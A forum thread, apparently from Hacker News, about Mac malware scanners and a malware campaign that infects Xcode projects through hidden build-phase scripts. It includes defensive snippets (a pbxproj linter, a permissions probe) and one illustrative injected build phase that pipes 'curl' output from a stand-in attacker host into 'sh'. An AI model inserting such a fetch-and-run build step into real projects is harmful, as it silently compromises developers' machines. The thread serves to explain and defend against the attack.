Does anyone know a good command line malware/antivirus checker for Mac? (Paid is fine.) I do not want the antivirus to run in the background continuously (which affects performance) yet want to have ability to run nightly scans to ensure that the machine is not infected.
Almost all traditional antivirus products want to integrate deeply with the system and significantly affect performance. Some of these companies are also known to make questionable decisions, like trying to intercept HTTPS communication.
It picks up newly created background daemon tasks and lets you block them immediately. That's certainly one major way to catch and block hidden malware on your computer.
All of the tools by this developer are incredible and come recommended, e.g. tools that detect and let you block access to the microphone or camera.
... and definitely read objective-see's blog posts from time to time if you are into security topics. The malware teardown write-ups are extremely enlightening.
(Interesting fact: a lot of malware quits immediately if Little Snitch is installed. So running Little Snitch alone prevents some malware from infecting your system.)
I would bet that whatever the answer is, you'd find it best by looking into what kind of antivirus software is used by ISP/business mail servers to malware-scan attachments during send/receive.
I don't know if it would work for a Mac, but on my personal Windows machine every month I boot on a "Kaspersky Rescue Disk" and do an offline scan of all my drives.
KRD is just a live Linux distro with Kaspersky's tools on it.
That's licensed under GPLv2, available for download without any kind of key/password, and includes build instructions. A Mac user could even use Homebrew to install it with one command.
And they even include instructions for mirroring the signatures here:
Already replied to another comment with this but you could try https://sqwarq.com/detectx/ which has command line usage included. (Not affiliated with them)
The only two I know of are Malwarebytes and Kaspersky.
The former installs with root privileges, runs on boot, and can never be closed, despite being only an on-demand scanner. I wrote to them to request an explanation and got no response.
Kaspersky has had its fair share of allegations against it, and I am not in a position to evaluate whether they are trustworthy.
> Malwarebytes […] installs with root privileges, runs on boot, and can never be closed, despite being only an on-demand scanner. I wrote to them to request an explanation and got no response.
Because they try to up-sell you their paid option, which scans automatically for you, with a 30-day trial.
This virus infected Delphi installations, injecting its code and compiling it into a system library. All programs using the infected library contained the virus, including some popular ones.
Because the infected programs came straight from the developer, and the virus did nothing unless you had Delphi installed, detections were often dismissed as false positives when they weren't. Originally, it had no malicious payload besides its replication mechanism.
> Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.
To understand why this happens, it's important to know how massive a typical .pbxproj file looks:
Ostensibly it's human-readable, but because it's generated by Xcode and filled with inscrutable UUIDs, people treat it like a binary file, and they're trained to do so:
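A common way this "training" gets institutionalized (this snippet is my own illustration, not something from the original post, though setups like it are widely circulated) is a `.gitattributes` rule that tells Git to treat the project file as opaque:

```
# .gitattributes -- commonly recommended setup (illustrative):
# treat Xcode project files as binary so they never appear in
# diffs or merges as reviewable text.
*.pbxproj binary
```

Once that rule is in place, the file effectively disappears from code review, which is exactly the blind spot the attack exploits.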
So why does this matter? Because the brilliance of this attack is how it "jumps the blood-brain barrier" between a developer's machine and their canonical codebase. Usually, code review and auditing of what goes into a commit prevents this kind of attack from leaping to VCS. But Apple makes the pbxproj so inscrutable, and does such a good job at hiding all its complexity behind (usually well-designed) wizards and dropdown menus, that people take it for granted. If code shows up there, people believe Apple intended that to be the case even if, say, your last commit was a small change in Interface Builder (or whatever they call it nowadays). Your code reviewer might just skip the file entirely, because they've been trained to expect the same.
And that's scary.
At the end of the day, this is just another way of exploiting the lack of a mature and centralized CI ecosystem in the modern package distribution world. There's no organization running a security-minded linter on pbxproj files as a general rule. But, then again, there doesn't need to be a linter on package.json or project.clj or Makefiles because there was never a history of hiding complexity - if that file changes, you'd better darn well know what you're doing. What we have here is a perfect storm of move-fast-break-things package management, a file designed to slip through code reviews, and a pretty creatively designed malware payload.
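Nothing stops an individual team from running such a check themselves, though. As a minimal sketch (my own illustration, not an existing tool), a pre-commit hook could flag every inline shell-script build phase in a pbxproj, since a `PBXShellScriptBuildPhase` is one obvious place where simply building a project executes arbitrary code:

```python
import re
import sys

# Naive pbxproj "linter" sketch (illustrative, not an existing tool):
# flag every shellScript entry, because each one is code that Xcode
# will execute on the next build.
SCRIPT_PATTERN = re.compile(r'shellScript\s*=\s*"(.*)"')

def find_script_phases(pbxproj_text):
    """Return (line_number, script) pairs for every inline build script."""
    hits = []
    for lineno, line in enumerate(pbxproj_text.splitlines(), start=1):
        m = SCRIPT_PATTERN.search(line)
        if m:
            hits.append((lineno, m.group(1)))
    return hits

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read()
    for lineno, script in find_script_phases(text):
        print(f"line {lineno}: build phase runs: {script!r}")
```

Run it against `project.pbxproj` in a pre-commit hook and require a human sign-off on any hit. It would not catch everything, but it would at least surface the one part of the file that is executable.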
EDIT: Perhaps another way to look at it is that having one file responsible for both compilation logic and non-compilation-related IDE-specific file status can be problematic. It's like your Makefile also needs to be your .gitignore-but-only-top-level-is-allowed-and-all-files-need-to-be-whitelisted. Of course, this is very much an Apple thing to do.
The Xcode project format (pbxproj) is simply ill-suited to proper code review. Any modest-size team should remove Xcode projects from their codebase and move to Bazel, Swift Package Manager, or XcodeGen. It is really not that difficult, and the benefit is quite obvious: https://liuliu.me/eyes/migrating-ios-project-to-bazel-a-real...
For a single developer I think it works OK to review pbxproj changes like other source.
You really should understand and recognize what each change is.
It’s when you have the additional dimension of multiple developers changing the project that it really becomes unwieldy and you are pushed into treating it as binary.
If you are already familiar with Bazel or don't mind spending a week to learn, sure. I manage all my personal projects in Bazel as well.
Otherwise, many people have had positive experiences with XcodeGen, which is closer to the Xcode project format than Bazel is. Besides, you can continue to use Carthage/CocoaPods with it.
> Ostensibly it's human-readable, but because it's generated by Xcode and filled with inscrutable UUIDs, people treat it like a binary file
Inscrutable? It seems like a textual dump of in-memory project structure using UUIDs to represent pointers and links (graph). Yeah, it's a chore to follow manually, but even to me, who has seen this format for the first time ever, it looks rather straightforward. Hasn't anyone written a utility "explorer" of these files?
The problem isn't so much that the format is hard to follow - it's that it's unclear what things do. Are those comments towards the end necessary? If there was a weird string somewhere containing AppleScript, how would I know that's not something that an updated version of Xcode decided was necessary due to a feature I activated, perhaps as a side effect of using a new UI element?
Wow, the way it spreads is fascinating, reminiscent of Reflections on Trusting Trust.
I'm a bit confused about
>two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.
Malware on the local machine can steal data from Safari on the local machine. Is that a surprise? Does Safari have a threat model that it intends to protect against locally running malware?
Data Vaults on macOS are intended to prevent apps running under the same unprivileged user from accessing files that belong to another app.
E.g., if there is a file/directory that only Safari is meant to have access to, no other app should be able to read it without at least bringing up one of the annoying "allow X to access your Y" prompts. For example, the first time you, say, grep your home directory, you'll get a bunch of TCC requests asking whether the host app (Terminal.app, say) should be allowed to access those files.
To add to this: there are two different types of Data Vaults. For locations such as ~/Pictures, ~/Documents, Calendars, Contacts, etc., a permission prompt is triggered when an app tries to access them. Other locations, such as where Mail and Safari keep their data, cannot be allowed from a prompt: those require "Full Disk Access" for third-party software to gain access, which you should grant only to applications that really need it, such as a backup tool.
Anything not in those locations is unprotected, so there's no Data Vault for Chrome's cookie file, for example.
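You can observe this behavior from a script. The sketch below is my own illustration (the probe path and the assumption that a TCC denial surfaces as a `PermissionError`, i.e. EPERM, are mine, not from the comments above): on macOS without Full Disk Access, listing Safari's container fails even though the directory exists and belongs to your own user.

```python
import os

def probe(path):
    """Try to list a directory and report how the OS responds.

    Assumption (macOS-specific): listing a Data Vault such as
    ~/Library/Safari without Full Disk Access fails with EPERM,
    which Python surfaces as PermissionError -- the directory
    exists, you just can't look inside it.
    """
    try:
        os.listdir(path)
        return "readable"
    except PermissionError:
        return "blocked"   # Data Vault / TCC denial
    except FileNotFoundError:
        return "missing"   # not on macOS, or the app never ran

if __name__ == "__main__":
    print(probe(os.path.expanduser("~/Library/Safari")))
```

Running this from Terminal.app without Full Disk Access should print "blocked"; grant Terminal Full Disk Access and it flips to "readable".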
Is there an API that allows apps to construct data vaults? I assumed that there would be, but I also generally don't write code at that level in the stack
Interesting, macOS has a much stricter permission system than I'm used to on Windows and Linux. On Windows and Linux, malware could just start controlling the mouse and keyboard and thus drive the browser to extract data from it, but on macOS controlling the mouse and keyboard apparently requires a special permission (Accessibility).
> Wow, the way it spreads is fascinating, reminiscent of Reflections on Trusting Trust.
Interestingly it's happened to Xcode before, and an impressive number of bad apps made it to the App Store as a result. See https://en.wikipedia.org/wiki/XcodeGhost.
XcodeGhost wasn’t an attack like this. That was a compromised version of Xcode. This doesn’t require a compromised version of Xcode; it infects Xcode projects. To perhaps put it into more familiar terms, this is as if a malicious Makefile goes around rewriting other Makefiles to include itself.
XcodeGhost was an attack like this in the context of Thompson's lecture, mentioned by Thorrez. Neither fully lives up to Thompson's premise, though. XcodeGhost is the closer of the two.
I was always under the impression that the point of sandboxing was to keep an application exploit from compromising the system. Not to keep the application safe from the system.
Indeed, the project's compiled binary doesn't contain malicious code, but the act of compiling the project causes the malicious code (which is just a binary blob) to execute and infect the system.
But if I pull that code and compile it, my executable will have the malware in it? I've never done anything in the macOS ecosystem at all, so I'm just asking.
No, if you pull that code and "compile" it with Xcode, it will run scripts that install malware on your machine. I assume that once the malware is on your machine, it can infect other Xcode projects on your machine.
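To make that concrete, here is a hypothetical sketch (fabricated for illustration; not the actual XCSSET payload, and the UUID and URL are made up) of what an injected entry can look like inside a .pbxproj. Xcode runs the `shellScript` value on every build of the project:

```
/* Hypothetical injected entry -- illustrative only */
1A2B3C4D5E6F7A8B9C0D1E2F /* ShellScript */ = {
    isa = PBXShellScriptBuildPhase;
    buildActionMask = 2147483647;
    files = ();
    runOnlyForDeploymentPostprocessing = 0;
    shellPath = /bin/sh;
    shellScript = "curl -s https://attacker.example/payload | sh";
};
```

Buried among hundreds of similar UUID-keyed blocks, an entry like this is easy to miss in review, which is the point made elsewhere in the thread.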
No risk as previous replier mentioned. I provided only the repo names for people who are afraid that they might have dependencies on an infected project.